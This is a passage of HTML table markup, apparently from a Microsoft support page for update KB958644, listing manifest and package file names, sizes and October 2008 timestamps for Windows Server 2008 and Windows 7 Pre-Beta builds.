class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,423</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_winpesrv~31bf3856ad364e35~ia64~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,443</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Update-bf.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,381</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6001.18157_none_8d050f6301b2186f.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">12,029</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6001.22288_none_8d6f3cb41ae72563.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">12,029</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:09</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr></table></div><br/><a class=\"bookmark\" id=\"2manifests\"></a><span class=\"text-base\">Additional file information for Windows 7 Pre-Beta</span><br/><br/><span class=\"text-base\">Additional files for all supported x86-based versions of Windows 7 Pre-Beta</span><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_1_for_kb958644~31bf3856ad364e35~x86~~6.1.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,817</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">18-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">09:47</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_1_for_kb958644~31bf3856ad364e35~x86~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,817</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">21-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:07</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_2_for_kb958644~31bf3856ad364e35~x86~~6.1.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,822</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">18-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">09:47</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_2_for_kb958644~31bf3856ad364e35~x86~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,822</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">21-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:07</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_client_0~31bf3856ad364e35~x86~~6.1.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,468</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">18-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">09:47</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_client_0~31bf3856ad364e35~x86~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,468</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">21-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:07</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_client~31bf3856ad364e35~x86~~6.1.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,456</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">18-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">09:47</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_client~31bf3856ad364e35~x86~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,456</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">21-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:07</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_winpe_0~31bf3856ad364e35~x86~~6.1.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,462</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">18-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">09:47</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_winpe_0~31bf3856ad364e35~x86~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,462</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">21-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:07</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_winpe~31bf3856ad364e35~x86~~6.1.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,466</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">18-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">09:47</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_winpe~31bf3856ad364e35~x86~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,466</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">21-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:07</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_8c88416a1b833ae7bf1ac5e3ba55e123_31bf3856ad364e35_6.1.6801.4107_none_5d2c1db358bd7f56.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">694</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">21-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:07</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_9622219576c10955b3e5860711ff058f_31bf3856ad364e35_6.1.6801.4106_none_977a59a5a18b9d73.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">694</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">18-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">09:47</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_microsoft-windows-netapi32_31bf3856ad364e35_6.1.6801.4106_none_c611da9707b43041.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,401</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">18-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">06:13</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_microsoft-windows-netutils_31bf3856ad364e35_6.1.6801.4107_none_68ebfd37504551fa.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,187</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">21-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">08:25</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr></table></div><br/><br/><span class=\"text-base\">Additional files for all supported x64-based versions of Windows 7 Pre-Beta</span><br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_6c5ff7f4df12fe656967bcd9a0851cf9_31bf3856ad364e35_6.1.6801.4107_none_9d8d50283e89a478.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">698</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">21-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:07</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_8bb4665ee38b9909b49c6690c13a54c9_31bf3856ad364e35_6.1.6801.4106_none_abaa496388f1d851.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,037</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">18-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">09:47</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_8c88416a1b833ae7bf1ac5e3ba55e123_31bf3856ad364e35_6.1.6801.4107_none_b94ab937111af08c.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">696</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">21-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:07</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_9622219576c10955b3e5860711ff058f_31bf3856ad364e35_6.1.6801.4106_none_f398f52959e90ea9.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">696</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">18-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">09:47</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_9ac4fb3739ecadbb3fe4552a8ce044b5_31bf3856ad364e35_6.1.6801.4106_none_5b9a53630b032ec0.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">698</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">18-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">09:47</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_f2e520fe3e78b2637293494b1895dead_31bf3856ad364e35_6.1.6801.4107_none_88b415476ce0db7b.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,037</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">21-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:07</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_microsoft-windows-netapi32_31bf3856ad364e35_6.1.6801.4106_none_2230761ac011a177.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,403</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">18-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">06:26</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_microsoft-windows-netutils_31bf3856ad364e35_6.1.6801.4107_none_c50a98bb08a2c330.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,189</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">21-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">08:33</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_1_for_kb958644~31bf3856ad364e35~amd64~~6.1.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,827</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">18-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">09:47</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td 